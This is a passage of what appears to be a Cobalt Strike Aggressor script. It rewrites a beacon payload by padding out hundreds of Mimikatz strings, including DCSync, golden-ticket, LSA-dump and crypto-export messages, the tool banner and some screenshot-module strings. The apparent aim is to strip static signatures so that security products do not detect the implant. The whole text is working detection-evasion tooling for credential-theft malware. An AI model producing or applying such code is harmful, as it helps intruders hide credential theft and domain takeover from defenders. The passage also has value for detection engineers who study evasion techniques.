    $beacon = strrep_pad ( $beacon, "Mimikatz", "SID history:", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "Password last change :", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "Account expiration   :", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "User Account Control :", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "Account Type         :", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "User Principal Name  :", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "SAM Username         :", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "** SAM ACCOUNT **", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "Key Package          : [", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "Key Package Size     :", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "byte(s)", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "Recovery Password    :", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "Recovery GUID (fake) :", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "Recovery GUID        :", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "Volume GUID          :", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "** BITLOCKER RECOVERY INFORMATION **", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "Object RDN           :", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kuhl_m_lsadump_dcsync_descrObject_csv ; RtlDecryptNtOwfPwdWithIndex", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kuhl_m_lsadump_dcsync_decrypt ; RtlDecryptNtOwfPwdWithIndex/RtlDecryptLmOwfPwdWithIndex", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "Hash ", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kuhl_m_lsadump_dcsync_SearchAndParseLDAPToIntId ; ldap_search_s 0x", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kuhl_m_lsadump_dcsync_SearchAndParseLDAPToIntId ; More than one entry?", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kuhl_m_lsadump_dcsync_SearchAndParseLDAPToIntId ; No values?", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "[ldap]", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kuhl_m_lsadump_dcsync ; Domain not present, or doesn't look like a FQDN", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kuhl_m_lsadump_dcsync ; Domain Controller not present", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kuhl_m_lsadump_dcsync ; Missing user or guid argument", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kuhl_m_lsadump_dcsync ; RPC Exception 0x", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kuhl_m_lsadump_dcsync ; GetNCChanges: 0x", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kuhl_m_lsadump_dcsync ; DRSGetNCChanges, invalid dwOutVersion (", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", ") and/or cNumObjects (", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kuhl_m_lsadump_dcsync ; kull_m_rpc_drsr_ProcessGetNCChangesReply", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "[DC] ms-DS-ReplicationEpoch is:", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "will be the user account", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "[DC] Object with GUID", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "[DC] Exporting domain", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "Revert to proces token", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "Impersonation", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "Identification", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "Anonymous", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "Run!", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "Impersonate a token", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "List all tokens of the system", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "Display current identity", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "CdcServer", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "UasServer", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "TrustedDomain", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "[DC]", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "TrustedDnsDomain", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "Export         :", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "* Unknown key (seen as", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "* Legacy key", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "PFX container  :", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "Out-1", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "In-1", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "unknown?", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "Random Value :", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "OlderCredentials", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "Default Iterations :", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "Default Salt :", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "OldCredentials", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "Default Salt :", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "NTLM-Strong-NTOWF", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "Kerberos-Newer-Keys", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "Supplemental Credentials:", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "LsaDump module", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "Skew1", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "Ask a DC to send current and previous NTLM hash of DC/SRV/WKS", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "Ask a server to set a new password/ntlm for one user", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "Ask a DC to synchronize an object", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "Ask LSA Server to retrieve Trust Auth Information (normal or patch on the fly)", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "Ask LSA Server to retrieve SAM/AD entries (normal, patch on the fly or inject)", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "Get the SysKey to decrypt NL$KM then MSCache(v2) (from registry or hives)", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "Get the SysKey to decrypt SECRETS entries (from registry or hives)", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "Get the SysKey to decrypt SAM entries (from registry or hives)", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kuhl_m_crypto_exportKeyToFile ; kull_m_file_writeData (", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kuhl_m_crypto_exportKeyToFile ; No suitable export type for key group:", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kuhl_m_crypto_exportKeyToFile ; NCryptExportKey", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "-- init):", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "-- data):", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kuhl_m_crypto_exportKeyToFile ; kull_m_string_EncodeB64_headers (", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "PRIVATE KEY", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "Algorithm Group", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kuhl_m_crypto_exportKeyToFile ; CryptExportKey(init) (0x", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kuhl_m_crypto_exportKeyToFile ; CryptExportKey(data) (0x", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "Private export :", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kuhl_m_crypto_exportRawKeyToFile ; kull_m_file_writeData (0x", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "KO -", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "OK -", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "Private raw export :", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kuhl_m_crypto_exportRawKeyToFile ; CryptImportKey (0x", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "Key permissions:", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "|Unique name   :", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "|Key Container :", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "|Provider name :", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "LSA isolation  :", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "Exportable key :", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "Export policy  :", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "Key size       :", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "Algorithm      :", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "Algorithm Name", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "Unique name    :", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "Unique Name", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "Key Container  :", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "|Implementation:", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "Impl Type", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "|Provider name :", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "Provider Handle", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "(null)", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "[!%hu!]", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "[BOOL  ]", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "[STRING]", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "[UINT64]", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "[INT64 ]", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "Id:", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "Entries[", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "SourceType:", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "Claims[", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kuhl_m_kerberos_hash_data_raw ; CDLocateCSystem :", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kuhl_m_kerberos_hash_data_raw ; HashPassword :", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kuhl_m_kerberos_golden_data ; kuhl_m_kerberos_encrypt", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "* KrbCred generated", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "* EncTicketPart encrypted", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "* EncTicketPart generated", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "* PAC signed", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "* PAC generated", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kuhl_m_kerberos_golden ; Missing user argument", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kuhl_m_kerberos_golden ; Missing domain argument", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kuhl_m_kerberos_golden ; Domain name does not look like a FQDN", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kuhl_m_kerberos_golden ; Missing krbtgt key argument (/rc4 or /aes128 or /aes256)", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kuhl_m_kerberos_golden ; Unable to locate CryptoSystem for ETYPE %u (error 0x%08x) - AES only available on NT6", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kuhl_m_kerberos_golden ; Krbtgt key size length must be", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", " bytes) for", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kuhl_m_kerberos_golden ; BerApp_KrbCred error", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "kull_m_file_writeData (", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kuhl_m_kerberos_golden ;", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "Final Ticket Saved to file !", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", " successfully submitted for current session", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "Golden ticket for", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "-> Ticket :", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "** Pass The Ticket **", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "Lifetime  :", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "Target    :", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "Service   :", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ServiceKey:", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "Claims    :", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "Extra SIDs:", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "Groups Id : *", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "User Id   :", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "SID       :", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "Domain    :", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "User      :", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kuhl_m_kerberos_ptt_data ; LsaCallAuthenticationPackage KerbSubmitTicketMessage : %", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kuhl_m_kerberos_ptt_data ; LsaCallAuthenticationPackage KerbSubmitTicketMessage / Package :", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "Kerberos package module", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "List tickets in MIT/Heimdall ccache", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "Pass-the-ccache [NT6]", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "Hash password to keys", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "Willy Wonka factory", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "Purge ticket(s)", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "Retrieve current TGT", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "Ask or get TGS tickets", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "List ticket(s)", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "Pass-the-ticket [NT 6]", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "Virtual Iso", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kuhl_m_dpapi_oe_domainkey_add ; No GUID or Key?", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kuhl_m_dpapi_oe_credential_add ; No SID?", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "[DC] ", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "will be the DC server", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "will be the domain", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "Description :", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "Full name :", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "Module :", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR mimikatz_doLocal ;", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "command of", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "module not found !", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR mimikatz_doLocal ;", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", ">>> ", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "module failed : ", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR mimikatz_initOrClean ; CoInitializeEx:", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "  .#####.   mimikatz 2.2.0-20220919 (x64) #19041 Mar 27 2024 11:34:27", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", " .## ^ ##.  \"A La Vie, A L'Amour\" - (oe.eo)", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", " ## / \\ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", " ## \\ / ##       > https://blog.gentilkiwi.com/mimikatz", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", " '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "mimikatz(powershell) #", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "token::elevate", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kull_m_string_displaySID ; ConvertSidToStringSid (", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kull_m_rpc_drsr_findAttr ; Unable to get an ATTRTYP for", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kull_m_rpc_drsr_MakeAttid ; kull_m_rpc_drsr_MakeAttid_addPrefixToTable", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kull_m_rpc_drsr_free_DRS_MSG_GETCHGREPLY_data ; dwOutVersion not valid", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kull_m_rpc_drsr_free_DRS_MSG_GETCHGREPLY_data ; TODO (maybe?)", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kull_m_rpc_drsr_free_DRS_MSG_DCINFOREPLY_data ; dcOutVersion not valid (", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kull_m_rpc_drsr_free_DRS_MSG_DCINFOREPLY_data ; TODO (maybe?)", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kull_m_rpc_drsr_free_DRS_MSG_CRACKREPLY_data ; nameCrackOutVersion not valid (", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kull_m_rpc_drsr_CreateGetNCChangesReply_encrypt ; No Session Key", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kull_m_rpc_drsr_CreateGetNCChangesReply_encrypt ; No valid data", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kull_m_rpc_drsr_CreateGetNCChangesReply_encrypt ; Unable to calculate CRC32", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kull_m_rpc_drsr_CreateGetNCChangesReply_encrypt ; RtlEncryptData2", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kull_m_rpc_drsr_ProcessGetNCChangesReply_decrypt ; No Session Key", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kull_m_rpc_drsr_ProcessGetNCChangesReply_decrypt ; No valid data", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kull_m_rpc_drsr_ProcessGetNCChangesReply_decrypt ; RtlDecryptData2", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kull_m_rpc_drsr_ProcessGetNCChangesReply_decrypt ; Unable to calculate CRC32", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kull_m_rpc_drsr_ProcessGetNCChangesReply_decrypt ; Checksums don't match (C:", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", " - R:", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kull_m_rpc_drsr_ProcessGetNCChangesReply ; Unable to MakeAttid for", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kull_m_rpc_drsr_CrackName ; RPC Exception 0x", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kull_m_rpc_drsr_CrackName ; CrackNames:", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kull_m_rpc_drsr_CrackName ; CrackNames: bad version", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kull_m_rpc_drsr_CrackName ; CrackNames: no item!", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kull_m_rpc_drsr_CrackName ; CrackNames (name status): 0x", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kull_m_rpc_drsr_getDCBind ; RPC Exception 0x", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kull_m_rpc_drsr_getDCBind ; IDL_DRSBind:", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kull_m_rpc_drsr_getDCBind ; No DRS Extensions Output", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kull_m_rpc_drsr_getDCBind ; Incorrect DRS Extensions Output Size (", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kull_m_rpc_drsr_getDCBind ; Incorrect DRS Extensions Output (", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kull_m_rpc_drsr_getDomainAndUserInfos ; RPC Exception 0x", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kull_m_rpc_drsr_getDomainAndUserInfos ; DomainControllerInfo: 0x", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kull_m_rpc_drsr_getDomainAndUserInfos ; DomainControllerInfo: bad version (", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kull_m_rpc_drsr_getDomainAndUserInfos ; DomainControllerInfo: DC", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", " not found", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kull_m_rpc_drsr_RpcSecurityCallback ; I_RpcBindingInqSecurityContext", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kull_m_rpc_drsr_RpcSecurityCallback ; QueryContextAttributes", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kull_m_rpc_Generic_Encode ; MesEncodeIncrementalHandleCreate:", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kull_m_rpc_Generic_Encode ; MesIncrementalHandleReset:", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kull_m_rpc_Generic_Encode ; RPC Exception:", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kull_m_rpc_Generic_Free ; MesDecodeIncrementalHandleCreate:", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kull_m_rpc_Generic_Decode ; MesIncrementalHandleReset:", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kull_m_rpc_Generic_Decode ; RPC Exception: 0x", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "[rpc] Password :", "rpc pwd");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "[rpc] Domain   :", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "[rpc] Username :", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "[rpc] AuthnSvc :", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "[rpc] Service  :", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kull_m_rpc_createBinding ; RpcStringBindingCompose: 0x", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kull_m_rpc_createBinding ; RpcBindingFromStringBinding: 0x", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kull_m_rpc_createBinding ; No Binding!", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kull_m_rpc_createBinding ; RpcBindingFree: 0x", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kull_m_rpc_createBinding ; RpcBindingSetAuthInfoEx: 0x", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kull_m_rpc_createBinding ; RpcBindingSetOption: 0x", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kull_m_rpc_createBinding ; Cannot add Service to NetworkAddr if NULL", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "Active mode", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "Erreur LocalAlloc:", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kull_m_net_getDC ; DsGetDcName:", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kull_m_ldap_getRootDomainNamingContext ; ldap_search_s 0x", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kull_m_ldap_getRootDomainNamingContext ; ldap_count_entries is NOT 1", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kull_m_ldap_getRootDomainNamingContext ; ldap_get_values_len is NOT 1", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kull_m_ldap_getLdapAndRootDN ; ldap_init", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kull_m_ldap_getLdapAndRootDN ; ldap_bind_s 0x", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kull_m_kernel_ioctl_handle ; DeviceIoControl (0x", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "====================", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "Base64 of file :", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR SkpEncryptionWorker ; Skp Crypto without CNG?", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR SkpEncryptionWorker ; SkpInitSymmetricEncryption: 0x", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR SkpEncryptionWorker ; SkpDeriveSymmetricKey: 0x", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR SkpEncryptionWorker ; BCryptGenerateSymmetricKey: 0x", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR SkpInitSymmetricEncryption ; SkpOpenAesGcmProvider: 0x", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR SkpInitSymmetricEncryption ; SkpOpenKdfProvider: 0x", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR SkpInitSymmetricEncryption ; SkpImportMasterKeyInKdf: 0x", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR SkpOpenKdfProvider ; BCryptOpenAlgorithmProvider: 0x", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR SkpOpenKdfProvider ; BCryptGetProperty: 0x", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR SkpOpenAesGcmProvider ; BCryptSetProperty: 0x", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kull_m_crypto_NCryptFreeHandle ; NCryptFreeObject(prov): 0x", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kull_m_crypto_NCryptFreeHandle ; No CNG to support this function", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kull_m_crypto_NCryptFreeHandle ; NCryptFreeObject(key): 0x", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kull_m_crypto_NCryptGetProperty ; NCryptGetProperty(%s) - init: 0x", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kull_m_crypto_NCryptGetProperty ; NCryptGetProperty(%s) - data: 0x", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kull_m_crypto_NCryptGetProperty ; NCryptGetProperty(%s) - simple NCRYPT_HANDLE: 0x", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kull_m_crypto_NCryptGetProperty ; NCryptGetProperty(%s) - simple DWORD: 0x", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kull_m_crypto_DerAndKeyInfoToPfx ; CertAddEncodedCertificateToStore (0x", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kull_m_crypto_DerAndKeyInfoToPfx ; CertSetCertificateContextProperty(CERT_KEY_PROV_INFO_PROP_ID) (0x", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kull_m_crypto_DerAndKeyToPfx ; CryptAcquireContext (0x", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kull_m_crypto_DerAndKeyToPfx ; CryptImportKey (0x", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kull_m_crypto_exportPfx ; PFXExportCertStoreEx/kull_m_file_writeData (0x", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kull_m_crypto_close_hprov_delete_container ; CryptGetProvParam/CryptAcquireContextA (0x", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kull_m_asn1_init ; ASN1_CreateModule", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kull_m_asn1_init ; ASN1_CreateDecoder:", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kull_m_asn1_init ; ASN1_CreateEncoder:", "");

    $beacon = strrep_pad ( $beacon, "Screenshot", "Quantization table 0x", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "Not a JPEG file: starts with", "");
